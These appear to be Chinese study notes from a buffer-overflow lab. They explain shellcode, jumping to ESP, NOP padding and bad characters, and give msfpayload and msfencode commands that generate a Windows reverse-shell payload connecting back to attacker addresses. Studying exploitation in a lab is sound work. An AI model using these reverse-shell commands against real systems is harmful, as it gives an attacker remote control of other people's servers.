在内存中存放数据完全相反的

f7键是调试过程中单步向前执行

下一步就向esp里面写入shellcode的代码啦

写shellcode 自己运用scratch写编码

第二就是现成的 kali里面有msfpayload 就是生产各种各样的shellcode

payload 又称载荷 要发到目标系统中 有目标系统进行执行 然后取得控制权之类的代码

shell是payload的子集 

生产shellcode 然后注入到esp寄存器里面 按他让我们跳转的方式执行从而控制目标服务器

或者是自己有一个后门程序 将他16进制提取出来 发到对方esp服务器里面 当然shellcode内容也比较要小

寻找的命令格式

win32 就是在windows上执行的

win32反向链接

让受害者主动向我进行连接

连我的结果就是将我的shell操作系统的权限发给你

msfencode 可以对shellcode进行编码 吧坏字符过滤 -b表示过滤

\x对应的汇编语言是nop 是不操作的意思

因为 保证shellcode运行的有效性 直接跳转到esp 前面的第一位或者几位字符可能被cpu进行擦除掉或者是覆盖 和cpu的特性有关 

find / -name msfpayload

cd /usr/share/framework2/

./msfpayload                   //用于生成payload

win32_reverse LHOST=192.168.1.117 LPORT=444 C  //生成用C语言写的反向连接444端口

win32_reverse LHOST=192.168.1.117  | grep 0d

win32_reverse LHOST=192.168.1.117  R | ./msfencode -b "\x00\x0a\x0d"     //-b表示不要

"\x90" 表示不操作    

发送测试数据08.py

断点停止后，按F7

使用msfpayload生成shellcode

cd /usr/share/framework2

./msfpayload -l

注意：现在服务器防火墙通常只允许外部访问特定端口，就算运行脚本开启服务器的其他端口外部也不能访问，故shellcode一般让服务器来主动连接攻击者端口

生成shellcode

./msfpayload win32_reverse LHOST=192.168.20.8 LPORT=443 C

在shellcode发现坏字符，通过编码绕过

./msfpayload win32_reverse LHOST=192.168.20.8 LPORT=443 R | ./msfencode -b “\x00\x0a\x0d”

将shellcode编入程序

为了避免shellcode前几个字符被擦掉，在shellcode前面插入几个空字符